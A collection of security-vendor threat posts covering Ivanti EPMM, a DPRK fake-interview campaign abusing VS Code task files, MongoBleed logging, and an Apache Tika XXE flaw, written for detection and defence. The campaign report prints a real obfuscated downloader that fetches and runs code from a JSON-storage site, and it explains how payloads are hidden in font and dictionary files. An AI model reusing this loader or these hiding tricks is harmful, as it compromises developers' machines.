Less work. Cleaner data. Better detections. Abstract is a security data pipeline with streaming-first detections built in. We process and analyze data in motion — reducing noise, lowering ingest costs, and enabling real-time detection with no SIEM rip-and-replace required.
In late January 2026, CISA added two critical vulnerabilities affecting Ivanti Endpoint Manager Mobile (EPMM) to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2026-1281 and CVE-2026-1340. These vulnerabilities affect the In-House Application Distribution and Android File Transfer Configuration features which are being actively exploited in the wild.
Ivanti EPMM is a mobile device management (MDM) platform that manages smartphones, tablets, and mobile applications across enterprise fleets. Given EPMM's privileged position in managing mobile devices and the platform's history of exploitation throughout 2025, immediate action is critical.
Technical Details
CVE-2026-1281 and CVE-2026-1340 allow attackers to exploit EPMM through HTTP GET requests containing malicious bash commands as parameters. The attack targets specific endpoints:
/mifs/c/aftstore/fob/ (Android File Transfer)
/mifs/c/appstore/fob/ (Application Store)
Key Behavioral Signature:
Legitimate use of these features results in HTTP 200 response codes
This filters for 404 responses to vulnerable endpoints while excluding legitimate localhost heartbeat traffic from patched systems.
Critical: On box logging can be manipulated by attackers who successfully exploit the system. Organizations must review logs from SIEM or centralized log aggregators, not from the EPMM server itself.
Affected Products
Vulnerable Versions:
Currently, specific version information is still being disclosed. Organizations should:
Assume all internet-facing EPMM instances are potentially vulnerable until patched
Review Ivanti's security advisory for confirmed version details
Apply available security updates immediately
Ivanti EPMM has been repeatedly targeted throughout 2025, with major campaigns by China-nexus APT groups compromising government, healthcare, financial services, and telecommunications sectors.
Indicators of Compromise
Organizations should immediately search Apache access logs for exploitation attempts:
Primary Detection Pattern:
404 responses to vulnerable endpoints from external IPs:
Key Advantage: Our detection operates on off box logs forwarded to the Abstract Security platform, ensuring visibility even if attackers manipulate on box logs after compromise.
If this detection triggers, immediately validate patch status, review source IPs, and search for GET requests containing bash commands.
Recommendations
Immediate Actions:
Apply security patches - Check Ivanti's advisory and patch immediately
Search access logs - Use the regex above to identify exploitation attempts in SIEM/log aggregator
Isolate unpatched systems - Remove from internet if patching cannot be done immediately
Enable off box log forwarding - Configure real-time Apache log forwarding to SIEM
Rotate credentials - Change all administrative passwords and service account credentials
Detection and Monitoring:
Implement automated monitoring for the detection regex pattern
Deploy alerts for GET requests with bash commands in parameters
Enable comprehensive logging with real-time off box forwarding
Establish 24/7 monitoring for EPMM platforms
Verify log integrity monitoring to detect tampering
Risk Assessment:
Identify all EPMM deployments, including forgotten or shadow IT instances
Determine which instances are internet-accessible
Evaluate cloud integration and identify stored access tokens
Review network segmentation and implement stricter controls
Response Planning:
Develop incident response procedures for EPMM compromise scenarios
Establish communication channels for escalation
Plan for complete server rebuild if compromise is detected
Coordinate with Ivanti support for incident response assistance
Conclusion
CVE-2026-1281 and CVE-2026-1340 represent critical threats to organizations using Ivanti EPMM. The distinctive 404 response signature provides clear detection opportunities, but organizations must act immediately to:
Apply available patches
Search access logs for exploitation attempts using the provided regex
Implement off box log forwarding and monitoring
Isolate unpatched systems
Conduct forensic reviews if exploitation is detected
CISA's KEV catalog inclusion signals active exploitation is occurring now. Successful compromise provides attackers with control over entire mobile fleets, access to cloud service tokens, and the ability to bypass multi-factor authentication.
Abstract Security customers benefit from real-time detection operating on off box logs, providing immediate visibility into exploitation attempts with automatic finding creation and MITRE ATT&CK context.
Organizations should not wait every hour of delay increases the risk of compromise.
Contagious Interview: Tracking the VS Code Tasks Infection Vector
Executive Summary
The DPRK-attributed Contagious Interview campaign continues to target software developers through fake recruitment schemes disguised as technical assessments and code reviews of projects hosted on platforms like GitHub. A relatively new technique in the campaign's arsenal leverages Microsoft Visual Studio Code task files (located at .vscode/tasks.json) to achieve malicious code execution upon project open. This report documents our observations tracking this vector, presents GitHub-based discovery methods, highlights unique findings including a newly published malicious Node Package Manager (NPM) package, and outlines detection opportunities for defenders.
Background
Recent reporting from the security community has documented the campaign's adoption of VS Code task files as an infection vector, ultimately leading to deployment of the BeaverTail downloader and InvisibleFerret backdoor:
Open Source Malware documented various types of repos containing malicious tasks files, associated "code puppets", and a marked reliance on Vercel domains for payload hosting.
Red Asgard published detailed C2 infrastructure analysis and some interesting results from probing the infrastructure.
Security Alliance (SEAL) provided a comprehensive breakdown of the attack's malware infection chain.
Earlier work from NVISO documented the campaign's use of legitimate JSON storage services for payload staging, a technique that remains in active use alongside the VS Code tasks vector.
This report builds on that foundation with additional observations from our tracking efforts.
The VS Code Tasks Vector
How It Works
Visual Studio Code's Task feature allows developers to automate workflows and run tools without manual interaction. Tasks are configured in the .vscode/tasks.json file for a workspace. The most important facilitator for this attack vector is the configuration's runOptions property, which supports a runOn value of folderOpen, causing the defined task to execute automatically when a workspace is opened. This is intended to streamline developer workflows like starting build watchers, linters, or development servers when a project opens.
Contagious Interview actors exploit this by including malicious shell commands in tasks.json files. When a victim clones a repository to their local machine and opens it in VS Code, the malicious task executes and kicks off the infection chain leading to malware installation. Furthermore, the presentation property among others in tasks.json can be configured to hide the shell activity entirely, leaving the victim unaware that anything executed at all.
This image breaks down the tasks configuration properties quite well (ref. pcaversaccio):
A Tiny, Tiny Silver Lining...
One might be somewhat relieved to know that tasks execution requires the victim to trust the workspace when prompted. However, this trust prompt is a single click away from compromise, and social engineering ("please follow the setup instructions exactly") is often sufficient to convince targets in the context of a job interview. Notably, once a workspace is trusted the user is never prompted again, establishing persistence for malware installation on subsequent project opens.
Additionally, a project doesn't necessarily have to start off with malicious tasks embedded; subsequent pulls containing newly added malicious tasks will execute without re-prompting. An attacker who controls or gains commit access to a previously trusted repository could push malicious changes that execute silently the next time a collaborator opens the project. This extends the threat model beyond cloning unfamiliar repositories to include ongoing collaboration with compromised projects.
Continuity with Existing Techniques
While the tasks.json vector is a newer addition to the campaign's toolkit and a marked move away from reliance on ClickFix for initial infection, it integrates with previously documented Contagious Interview techniques:
Obfuscated JavaScript payloads executed via Node.js
Payloads masquerading as non-JavaScript files (fonts, images, configuration files)
Hosting payload servers on web application platforms (Vercel, Render)
Staging on JSON storage sites (JSON Keeper, JSON Silo, and npoint.io)
Malicious NPM package dependencies
The tasks.json file serves as the trigger mechanism, while downstream payload delivery mirrors patterns documented by the research community over the past year.
The earliest public POC of this VS Code backdoor technique appears in this VS Code-Backdoor repository from researcher SaadAhla.
Tracking Activity with GitHub Code Search
GitHub Code search provides an effective mechanism for identifying repositories using this technique. We developed several queries to surface malicious tasks.json files and track campaign activity.
Finding Tasks.json with Downloaders
This query identifies repositories containing tasks.json files with commands directly running curl or wget to fetch and immediately execute payloads.
path:tasks.json runOn folderOpen (curl OR wget) (cmd OR "| sh")
Most tasks cover both Windows and Unix-like platforms. Here are some command samples:
This surfaces new repositories from known personas (puppet GitHub user accounts associated with Contagious Interview activity), identifies new personas using similar techniques, and reveals variations in implementation. However, it does not capture everything. Some tasks.json commands execute payloads stored elsewhere in the repository or trigger infections through malicious package installations rather than direct downloads.
An Amusing Evasion Technique
While reviewing search results, we noticed several tasks.json files' commands appeared empty at first glance, but a horizontal scroll bar hinted at content extending beyond the visible window.
Scrolling right revealed the malicious commands padded with whitespace to push them far off the right edge of the screen, presumably to hide them from cursory manual review. These are easily missed unless a user notices the horizontal scroll bar.
Existing reporting often highlights Vercel domain abuse, and for good reason as it's a consistent pattern in this campaign evolution. However, we observe that non-Vercel domains are also used, revealed by excluding "vercel" from our search:
path:tasks.json runOn folderOpen (curl OR wget) (cmd OR "| sh") NOT vercel
This query finds malicious tasks.json files not using Vercel domains, surfacing outliers. Note that this can include false positive results and should be reviewed.
The search revealed the following additional payload hosting domains, all of which appear in recently created or updated repositories as of the time of this analysis.
www[.]vscodeconfig[.]com
www[.]regioncheck[.]xyz
vscode-load[.]onrender[.]com
Payload Masquerading in Image, Font, and Text Files
Fake Spellcheck
One tasks file using regioncheck[.]xyz within repo ta3pks/Decentralized-Social shows a case of Node executing a .vscode/spellright.dict file:
The spellright.dict file appears to be a dictionary for the Spell Right VS Code extension. Spoiler, it's obfuscated JavaScript. Node.js doesn't care about file extensions. It will execute JavaScript from a .dict file without complaint.
Hunting for Tasks Executing Image and Font Files
This GitHub Code search surfaces tasks.json commands using node to execute JavaScript hidden in image and font files (add extensions as needed, or look for NOT .js to catch more variations). Again, mind the false positives in the results.
path:tasks.json runOn folderOpen node (.woff OR .svg OR .jpeg OR .png)
These all contain obfuscated JavaScript, such as in this webfonts/fa-brands-regular.woff2.
From a detection perspective, commands like node webfonts/fa-brands-regular.woff2 initially seem straightforward to catch, but there are variations to consider. For example, this sample checks for Node.js availability before execution:
We noticed that these tasks.json files often contained "label": "eslint-check". Using that label in this search returned the same results along with new variants.
"h=require('https');(async()=>{try{u=Buffer.from('aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9RSlpDRw==','base64')+'';d=await new Promise((r,j)=>{h.get(u,s=>{b='';s.on('data',c=>b+=c).on('end',()=>r(JSON.parse(b)));}).on('error',j);});new Function('require',Buffer.from(d.model,'base64')+'')(require);}catch(e){}})();"
]
...
This downloads and executes the next stage from a JSON Keeper URL - https://www[.]jsonkeeper[.]com/b/QJZCG. The response content was captured using URLScan meows://urlscan[.]io/dom/019bdb75-40cb-7548-abd5-4558496217d5/ (Warning: This is an actual malicious payload. Handle with caution.).
Variant 2
chocoscoding/hmmm/.vscode/tasks.json supposedly runs JavaScript from a fake CSS file. However, while this project shares similarities with other Contagious Interview repositories, the referenced CSS file currently appears benign.
These are interesting because conf.js is used to indirectly run payloads stored in other files, somewhat less obvious than previous cases. Take this example from diemlibre-finance/evm01-66-release/server/config/conf.js:
new Function('require','module','exports','__filename','__dirname', src)(
require,
module,
exports,
__filename,
__dirname
);
This script extracts hex-encoded JavaScript from webfonts/fa-brands-regular.woff2, decodes it, and executes it using the Function constructor. As expected the font file contains the obfuscated payload.
Hunting for Obfuscated Payloads Directly
The observed JavaScript obfuscation patterns can be used to hunt for similar masquerading files in GitHub Code Search independent of tasks.json. Note that these searches return many results that aren't necessarily part of the Contagious Interview campaign, so manual review is required to determine attribution.
Hunting hexadecimal entity names in WOFFs and SVGs
(path:woff OR path:*svg) AND /[^a-zA-Z0-9]_0x[a-f0-9]{6}[=,\(\)\[\]\{\}]/
Hunting using commonly seen keywords
Obfuscation patterns change. Trying different search approaches such as based on commonly seen strings uncovers additional samples:
(path:woff OR path:*svg) AND fromcodepoint AND length AND undefined AND push AND 0x
Malicious NPM Package Installation Variant
One repository presenting itself as a "Food Ordering Web App Technical Assessment (MERN Stack)" takes a different approach. Rather than executing payloads directly from tasks.json, it triggers NPM installation of a malicious package dependency.
The tasks.json makes use of args like so to run npm install and start a backend server.
The backend/package.json includes:
The package "jsonwebauth" sounds plausible, but code in backend/server.js reveals an inconsistency. The jsonwebauth package is imported as dotenv and used as Express middleware. Neither makes sense for a supposed JWT library and raises suspicion.
const express = require('express');
const dotenv = require('jsonwebauth');
const cors = require('cors');
require('dotenv').config();
const { connectDB } = require('./config/db.js');
...
// app config
const app = express();
const port = 4000;
// middleware
app.use(express.json());
app.use(cors());
app.use(dotenv());
// db connection
connectDB();
...
The Malicious Package "jsonwebauth"
The jsonwebauth package on npm was published on January 8, 2026 just days prior to our analysis. The package page has inconsistencies typical of malicious packages published by the Lazarus Group for the Contagious Interview campaign.
Upon cursory review in the Code tab, the lib folder weighs in at 380 kB, well above the sizes of other files and folders.
Within that the file lserver.js (326 kB) contains the malicious payload.
This package is tracked on the DPRK npm packages tracker as part of the Contagious Interview campaign.
Searching GitHub for repositories using this package returns 2 additional results:
path:package.json jsonwebauth
Bonus: Hardcoded Database Credentials
The same repository contains a MongoDB connection string with hardcoded credentials under backend/config/db.js:
The unique username dulanjalisenarathna93 itself can be used to track other repositories using the same database or potentially associated with the campaign.
Finding Activity Through Commit Authors
Many of the personas that own malicious repositories or have committed to them can be leveraged to map out undiscovered repositories. However, their commit histories are often extensive and not always for files of interest like tasks.json.
We've found that searching for commits from git commit authors who have no linked GitHub account tends to yield less noisy results. In these examples, we search for commit author emails associated with personas that have made commits to tasks.json files in other malicious repositories. These return highly relevant results.
Compare that to author-name:"yosket" (a deleted GitHub persona associated with many commits to Contagious Interview repositories) which returns a whopping 3.5k results.
Note that these commit emails are arbitrary and cannot necessarily be used to identify real users. Rather they serve as pivot points for tracking repositories through commit histories. These emails may be throwaway or stolen addresses used only for git commits.
Mitigations
Disable automatic task execution. Set task.allowAutomaticTasks to off in VS Code user settings. This prevents tasks with runOn: folderOpen from executing without explicit user action.
Use GitHub's web editor for initial review. Pressing the "." key on any GitHub repository opens a browser-based VS Code environment at github.dev. This environment has no shell capability, allowing safe inspection of repository contents including .vscode/tasks.json files.
Avoid opening unfamiliar repositories in VS Code Desktop. Repositories received as part of job interviews or technical assessments carry elevated risk. If you must open such repositories in VS Code Desktop, check first in-browser for a .vscode/tasks.json file set to execute commands automatically on folder open, and do not trust the workspace when prompted.
Consider the broader attack surface. The VS Code tasks vector is one of many. From malicious npm packages to yet-unknown techniques, there are too many risks with opening unfamiliar repositories in VS Code. When possible, use sandboxed environments or browser-based tools for initial review.
Detection Opportunities
VS Code child process activity. Monitor for VS Code spawning child processes running curl, wget, powershell, bash, cmd, or similar utilities shortly after process start.
Node.js executing non-JavaScript files. Alert on Node.js executing files with unexpected extensions such as .woff, .woff2, .svg, .jpeg, .png, .dict, .npl, or other non-JS extensions.
VS Code tasks initiating requests to Vercel domains. Monitor for VS Code process starts followed closely by network requests to Vercel domains.
Platform-specific URL patterns. Requests to Vercel URLs containing platform indicators in the path (/linux, /mac, /windows) combined with query parameters (flag=, token=).
JSON storage and paste site access. Requests from non-browser processes to JSON storage URLs (jsonkeeper[.]com, jsonsilo[.]com, api[.]npoint[.]io) and paste sites (pastebin[.]com).
Conclusion
The Contagious Interview campaign's adoption of VS Code task files represents a pragmatic evolution in initial access techniques. By exploiting a legitimate IDE feature designed for developer productivity, threat actors achieve code execution and persistence with minimal user interaction, requiring only that the victim trust a workspace.
GitHub Code Search provides an effective mechanism for tracking campaign activity, identifying new repositories, and discovering technique variations. The queries and methodologies outlined here support ongoing monitoring.
Defenders should implement the mitigations and detection opportunities outlined in this report. Developers should exercise caution when opening repositories from unfamiliar sources, particularly those presented as part of recruitment processes.
With the recent publicizing of the MongoBleed vulnerability (CVE-2025-14847), many security organizations will inevitably be scrambling to understand what log visibility is available to them to detect and respond to MongoDB related security incidents.
Historically speaking, MongoDB logging has been a bit of a double-edged sword. On the one hand, it is possible to turn on very verbose debug logging to enable visibility of some of these interesting events. On the other hand, in production systems, these logs can be quite voluminous. Performance implications can be created if too much debug logging is enabled on high throughput systems, so understanding what is available and what is required to satisfy your visibility requirements is paramount.
The good news is that if you are using the Abstract Security platform as a security data pipeline, MongoDB logs can be quickly and easily aggregated to greatly lower the total cost for signaling effectively on this important log source.
While we’ll reference Abstract where it’s illustrative, this post is not a walkthrough of platform features. The goal is to give security teams a clear mental model for MongoDB logging, attack-driven log volume, and how to reason about signal versus noise in any environment.
Due to the nature of the MongoBleed attack, there are tens of thousands of packets which are required to be sent back and forth to the MongoDB server to effectively scrape useful data out of memory. This can cause security teams huge headaches, because to effectively signal on the command debug data enabled by the logComponentVerbosity parameter, you must open the MongoDB log floodgates.
When we tested ingesting this data into the Abstract Security platform and enabling our default MongoDB aggregation with 0 tuning whatsoever, we were able to see an 85%+ decrease in MongoDB logs out-of-the-box.
16,604 logs were shrunk to 2,427 events, with some of the logs being aggregated as highly as 7067:1, using only a 1-minute aggregation window.
With further configuration and tuning, dropping log events which have little or no security value, it’s highly likely that some organizations will see > 90% reduction in logs, while still being able to effectively signal against the data.
Here is an example of a low value raw command error log which generated over 8k logs by running the default MongoBleed attack:
{
"t":{
"$date": "2025-12-27T20:04:06.437+00:00"
},
"s": "D1",
"c": "COMMAND",
"id": 21963,
"ctx": "conn6",
"msg": "Assertion while parsing command",
"attr":{
"error": "InvalidBSON: BSON object not terminated with EOO in element with field name '?' in object with unknown _id"
}
}
These logs aren’t really that useful and can be dropped entirely without losing security visibility. There is no source IP address, and the truly valuable corresponding connection log—which has the actual valuable information—contains additional data like the source IP address and other details regarding the query:
{
"t":{
"$date": "2025-12-27T20:04:06.437+00:00"
},
"s": "I",
"c": "COMMAND",
"id": 51803,
"ctx": "conn6",
"msg": "Slow query",
"attr":{
"type": "none",
"isFromUserConnection": true,
"ns": "",
"collectionType": "none",
"numYields": 0,
"ok": 0,
"errMsg": "BSON object not terminated with EOO in element with field name '?' in object with unknown _id",
"errName": "InvalidBSON",
"errCode": 22,
"reslen": 180,
"locks":{},
"cpuNanos": 109443,
"remote": "172.19.0.1:60488",
"numInterruptChecks": 0,
"queues":{
"ingress":{},
"execution":{}
},
"workingMillis": 0,
"durationMillis": 0
}
}
Aggregating these “Slow query” events, while keeping useful information such as the source IP address, message and error message, provides tremendous signaling value without having to waste resources on processing low value log data.
Furthermore, this logging is not just useful for security logging. Monitoring for things like “Slow query” events within MongoDB can help tune your application or system to ensure your database is operating optimally and so is useful to SRE and security teams alike.
Recommendations
Databases within organizations will remain targets for attackers for the foreseeable future. These systems are often the source of truth within organizations, and as such should be treated as first class citizens when it comes to health monitoring, logging, threat detection, and incident response. Prioritizing the ingestion of these critical data sources remains at the forefront of the observability and DFIR space.
Conclusion
To successfully detect MongoDB systems being abused, both by MongoBleed and other attack vectors, some form of event firehose must be enabled. Some teams may only have the ability to enable network level logging and will need to deduce which systems trigger volumetric anomalies within their environment. Others will be able to use the native MongoDB logComponentVerbosity parameter to enable logs required to effectively defend their MongoDB instances.
In either case, simply turning on these massive feeds and logging everything will prove both costly, and resource intensive. Effectively managing your security data pipelines to greatly reduce the total amount of ingested data required to make an informed decision or assertion will help your security teams triage and respond to the latest threats effectively, both now and in the future.
We don’t know when the next huge vulnerability will become public and require onboarding new data sources so teams can effectively defend their estate. When it does happen, Abstract Security will be there to help our customers separate the signal from the noise, making the big picture clearer so your teams can act swiftly, safely and confidently.
Abstract Security Threat Research Organization (ASTRO)
Shortly before Christmas 2025, security researcher Joe Desimone disclosed CVE-2025-14847, a high-severity memory disclosure vulnerability in MongoDB Server rated CVSS 8.7. The vulnerability, dubbed "MongoBleed", affects MongoDB Servers when zlib network message compression is enabled.
The attack vector is unauthenticated and remote, requiring only the processing of a specially crafted compressed message to achieve exploitation. Given MongoDB's widespread use in web applications, content management systems, and backend services, the potential impact spans numerous industries including finance, healthcare, government, and technology sectors.
Technical Details
As discussed by Ox Security here, the vulnerability stems from improper handling of length parameter inconsistencies in zlib-compressed protocol header parsing within MongoDB Server.
Many applications expose MongoDB ports to internal networks or, in misconfigured environments, directly to the internet. In both scenarios, simply sending malicious compressed messages is sufficient to trigger the vulnerability, with no user interaction or authentication beyond network access required.
Furthermore, if default command line parameters are used, there won’t be any visibility of the attack within MongoDB audit logs. To detect this effectively would entail having either an Intrusion Detection System (IDS) monitoring the traffic going to and from the affected MongoDB server, or MongoDB command logging to be enabled. To enable MongoDB command logging, which will show BSON parsing errors and slow queries, add the following to your MongoDB init command line:
This will show you BSON parsing and assertion errors which can be triaged and responded to:
{
"t":{
"$date": "2025-12-27T18:01:10.195+00:00"
},
"s": "I",
"c": "COMMAND",
"id": 51803,
"ctx": "conn8159",
"msg": "Slow query",
"attr":{
"type": "none",
"isFromUserConnection": true,
"ns": "",
"collectionType": "none",
"numYields": 0,
"ok": 0,
"errMsg": "incorrect BSON length in element with field name 'a' in object with unknown _id",
"errName": "InvalidBSON",
"errCode": 22,
"reslen": 166,
"locks":{},
"cpuNanos": 113281,
"remote": "172.19.0.1:51379",
"numInterruptChecks": 0,
"queues":{
"ingress":{},
"execution":{}
},
"workingMillis": 0,
"durationMillis": 0
}
}
In addition to the “Slow query” logs, which will be very numerous from the attacking source IP, there will also be error logs with the msg value “Assertion while parsing command”:
{
"t":{
"$date": "2025-12-27T18:01:10.198+00:00"
},
"s": "D1",
"c": "COMMAND",
"id": 21963,
"ctx": "conn8160",
"msg": "Assertion while parsing command",
"attr":{
"error": "InvalidBSON: incorrect BSON length in element with field name 'a' in object with unknown _id"
}
}
The barrage of “Slow query” MongoDB log msg values currently appears to be the most valuable MongoDB log, as it also contains the source IP address and port of the attacker. A default MongoBleed attack generated over 8k of each of the log lines.
Note, incident responders may require firewall or other network logs to marry the source connection information to the actual attacker dealing with network address translation (NAT).
Affected Products
Vulnerable Versions:
The vulnerability affects multiple versions of MongoDB Server dating back to version 3.6:
· MongoDB < 8.2.3
· MongoDB < 8.0.17
· MongoDB < 7.0.28
· MongoDB < 6.0.27
· MongoDB < 5.0.32
· MongoDB < 4.4.30
· MongoDB 4.2 – All versions, no fix available
· MongoDB 4.0 – All versions, no fix available
· MongoDB 3.6 – All versions, no fix available
Patched Versions:
MongoDB 8.2.3+
MongoDB 8.0.17+
MongoDB 7.0.28+
MongoDB 6.0.27+
MongoDB 5.0.32+
MongoDB 4.4.30+
Indicators of Compromise
Organizations should create mechanisms to centralize MongoDB command error logging and use that to triage large spikes (>1k) in “Slow query” messages, which could indicate MongoBleed is being used against the affected system. The presence of hundreds or thousands of “InvalidBSON: incorrect BSON length in element with field name” is also highly indicative of intentional BSON tampering which could lead to sensitive information disclosure.
When the MongoBleed attack was run against a vulnerable server for testing, by default it generated over 8k “Slow query” log messages. Spikes of this log message over 1k should be triaged and investigated immediately.
Attack Signatures & Log Search Queries:
Large spike (>1k) of “Slow query” msg with errMsg containing “incorrect BSON length in element with field name”
Large spike (>1k) in errCode = 22
Post-Exploitation Indicators:
CPU and memory contention from a large spike in malformed requests
Large amounts of data being requested from an IP which has not authenticated successfully
Organizations identifying these indicators should immediately initiate incident response procedures and conduct comprehensive mitigation and forensic analysis.
Recommendations
Organizations using MongoDB should take immediate action to patch this critical vulnerability.
Immediate Actions:
Upgrade MongoDB to patched versions referenced in the Patched Versions section
Enable command error logging to be able to detect suspicious and malicious MongoDB queries
Risk Assessment:
Identify all MongoDB deployments and ensure they have proper logging and network IDS visibility enabled
Review network segmentation to determine if MongoDB instances can be segmented further
Immediate Workarounds (if patching is not immediately feasible):
Disable ZLIB compression support from within MongoDB until a patch can be applied
Detection and Monitoring:
Enable comprehensive logging for all document processing workflows, including full request payloads where feasible.
Implement real-time monitoring for large spikes (>1k “Slow query” logs) in errors caused on the MongoDB systems
Correlate “Slow query” logs with upstream network traffic to ensure rapid mitigation for ongoing attacks
Response Planning:
Prepare incident response procedures for potential exploitation, including system isolation steps and forensic log collection requirements.
Consider implementing defense-in-depth measures including Intrusion Detection Systems (IDS) with volumetric detection rules against any databases, though these should not replace patching.
Conclusion
CVE-2025-14847 represents a high severity vulnerability in a very widely deployed database, MongoDB. With unauthenticated remote exploitation this vulnerability demands immediate attention from every organization using MongoDB.
Ensuring that your MongoDB system has appropriate network segmentation is paramount to reducing the attack surface for this exploit. Validating that only required systems have network access to your MongoDB instance will help ensure less exploitation.
In addition, if possible, command-level debug logging should be enabled with:
In doing so, security teams gain clear visibility into performance issues as well as exploitation attempts, through the distinctive InvalidBSON errors generated during attacks. Combined with network flow analysis for connection anomaly detection, organizations can build robust detection capabilities for this vulnerability class.
The logging configuration described here balances detection fidelity with operational overhead, providing the specific visibility needed to detect this threat. With proper use of security data pipelines, many of these log messages can even be aggregated to provide high fidelity visibility, without consuming large quantities of disk space, or bogging down your security teams.
Appendix A
Example logs from MongoDB with MongoBleed being run against it.
Example logs from MongoDB with MongoBleed being run against it.
Abstract Security Threat Research Organization (ASTRO)
Critical Apache Tika Vulnerability: CVE-2025-66516 Enables XXE Injection
Background
On December 4, 2025, the Apache Software Foundation disclosed CVE-2025-66516, a critical XML External Entity (XXE) injection vulnerability in Apache Tika rated CVSS 10.0. The vulnerability affects multiple core components of Apache Tika, including tika-core (versions 1.13-3.2.1), tika-pdf-module (versions 2.0.0-3.2.1), and tika-parsers (versions 1.13-1.28.5).
This advisory expands upon the previously disclosed CVE-2025-54988 (CVSS 8.4) from August 2025, clarifying the full scope of affected artifacts. While the original report identified the PDF parser module as the entry point, the underlying vulnerability and its fix reside in tika-core, meaning organizations that only patched the PDF module remain vulnerable.
The attack vector is unauthenticated and remote, requiring only the processing of a specially crafted PDF file to achieve exploitation. Given Apache Tika's widespread use in document processing pipelines, search indexing systems, content analysis platforms, and security tools, the potential impact spans numerous industries including finance, legal, government, and media sectors.
Technical Details
The vulnerability stems from improper XML entity processing in Apache Tika's handling of XFA (XML Forms Architecture) content embedded within PDF documents. XFA is an XML-based specification used to define form elements and data within PDFs, and Tika parses this content during document analysis and metadata extraction.
An attacker can craft a malicious PDF containing XFA data with external XML entity references. When Tika processes this document, it resolves these external entities without proper validation, enabling several attack vectors. The attacker can read arbitrary files from the server filesystem, potentially accessing sensitive configuration files, credentials, or application data. Additionally, the vulnerability enables Server-Side Request Forgery (SSRF) attacks, allowing the attacker to probe internal networks, access cloud metadata services, or interact with internal APIs not exposed to the internet. In resource-constrained environments, the exploitation can cause Denial of Service through entity expansion attacks that consume excessive memory or CPU.
The critical nature of this vulnerability is amplified by Apache Tika's typical deployment pattern. Many applications automatically process uploaded documents for indexing, preview generation, or content extraction. In such environments, simply uploading a malicious PDF is sufficient to trigger the vulnerability, no user interaction or authentication beyond upload access is required.
Affected Products
Vulnerable Versions:
Apache Tika core (org.apache.tika:tika-core): 1.13 through 3.2.1
Apache Tika PDF parser module (org.apache.tika:tika-parser-pdf-module): 2.0.0 through 3.2.1
Apache Tika parsers (org.apache.tika:tika-parsers): 1.13 before 2.0.0
Patched Versions:
Apache Tika core: 3.2.2 or later
Apache Tika parsers: 2.0.0 or later (for 1.x users)
Critical Clarification:
The scope expansion in CVE-2025-66516 addresses two key oversights from the original CVE-2025-54988 disclosure. First, while the PDF parser module was identified as the entry point, the actual vulnerability exists in tika-core. Organizations that upgraded tika-parser-pdf-module but not tika-core to version 3.2.2 or later remain vulnerable. Second, in Tika's 1.x release series, the PDF parser was bundled within the tika-parsers module rather than as a separate artifact. These legacy deployments were not explicitly called out in the initial advisory.
Indicators of Compromise
Organizations should immediately review logs for exploitation attempts targeting document processing endpoints. The vulnerability is exploited through malicious PDF uploads containing crafted XFA content.
Attack Signatures:
PDF uploads with XFA content containing external entity declarations (DOCTYPE with SYSTEM or PUBLIC identifiers)
Unusual file access patterns from Tika processes, particularly reads to sensitive files like /etc/passwd, configuration files, or credential stores
Outbound network connections from Tika processes to unexpected destinations, especially cloud metadata endpoints or internal network ranges
Resource exhaustion patterns indicating entity expansion attacks, such as memory spikes or CPU saturation during PDF processing
Log Search Queries:
Application logs: Errors mentioning "EntityExpansionException", "DOCTYPE", or "ENTITY" during PDF processing
Network logs: Outbound HTTP requests from application servers to internal IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) or cloud metadata services (169.254.169.254)
File system audit logs: Unexpected file access by the Tika process or application server user, particularly to system files or configuration directories
Post-Exploitation Indicators:
Data exfiltration through external entity references to attacker-controlled servers
Lateral movement attempts from compromised document processing infrastructure
Modified or newly created files in web directories without corresponding deployments
Unauthorized access to internal services discovered through SSRF exploitation
Organizations identifying these indicators should immediately initiate incident response procedures and conduct comprehensive forensic analysis.
Recommendations
Organizations using Apache Tika must take immediate action to address this critical vulnerability.
Immediate Actions:
Upgrade tika-core to version 3.2.2 or later. This is mandatory regardless of your tika-parser-pdf-module version.
For organizations running Tika 1.x, upgrade tika-parsers to version 2.0.0 or later.
Verify all three artifacts (tika-core, tika-parser-pdf-module, tika-parsers) are at safe versions in a coordinated manner.
If using Apache Tika as a transitive dependency through other libraries, audit your dependency tree and ensure all Tika components are updated.
Risk Assessment:
Identify all applications processing untrusted PDF documents, particularly public-facing upload endpoints, email attachment processors, and document management systems.
Map Tika deployments to understand potential blast radius, including systems with access to sensitive data or internal networks.
Review network segmentation to determine if exploited Tika instances could reach critical internal resources.
Immediate Workarounds (if patching is not immediately feasible):
Disable PDF parsing capability entirely by removing or excluding the PDF parser from your Tika configuration.
Implement strict input validation and sanitization for uploaded files, though note this is not a complete mitigation.
Deploy network-level controls to prevent Tika processes from making outbound connections or accessing sensitive internal resources.
Consider processing untrusted documents in isolated, sandboxed environments with minimal privileges and network access.
Detection and Monitoring:
Implement real-time monitoring for PDF processing operations, with alerts for unusual patterns such as external entity references or unexpected network activity.
Deploy file system monitoring to detect unauthorized access from Tika processes.
Enable comprehensive logging for all document processing workflows, including full request payloads where feasible.
Establish baseline behavior for legitimate document processing to identify anomalous activity.
Response Planning:
Prepare incident response procedures for potential exploitation, including system isolation steps and forensic log collection requirements.
Review privilege levels for Tika processes and implement least-privilege principles to limit potential impact.
Consider implementing defense-in-depth measures including Web Application Firewalls (WAF) with XXE detection rules, though these should not replace patching.
Conclusion
CVE-2025-66516 represents a maximum-severity vulnerability in one of the most widely deployed document processing frameworks. With a CVSS score of 10.0, unauthenticated remote exploitation, and broad impact across multiple Apache Tika artifacts, this vulnerability demands immediate attention from every organization using Tika for document processing.
The expansion of scope beyond the original CVE-2025-54988 highlights the complexity of modern dependency chains and the critical importance of comprehensive patching strategies. Organizations cannot assume that addressing a single component in a modular framework provides complete protection, the underlying shared libraries must also be secured.
Security teams should recognize that document processing represents a critical attack surface in modern applications. Systems that automatically parse, analyze, or extract content from user-supplied files are inherently exposed to content-based attacks like XXE. This vulnerability should serve as a catalyst for broader security improvements in document processing pipelines, including proper input validation, sandboxing, network segmentation, and comprehensive monitoring.
Abstract Security Threat Research Organization (ASTRO)
Critical React Server Components RCE (CVE-2025-55182): What You Need to Patch Now
Background
On December 3, 2025, the React team disclosed CVE-2025-55182, a critical remote code execution vulnerability in React Server Components (RSC) rated CVSS 10.0. The vulnerability affects React versions 19.0, 19.1.0, 19.1.1, and 19.2.0, as well as frameworks that implement RSC, most notably Next.js versions 14.3.0-canary through 16.x.
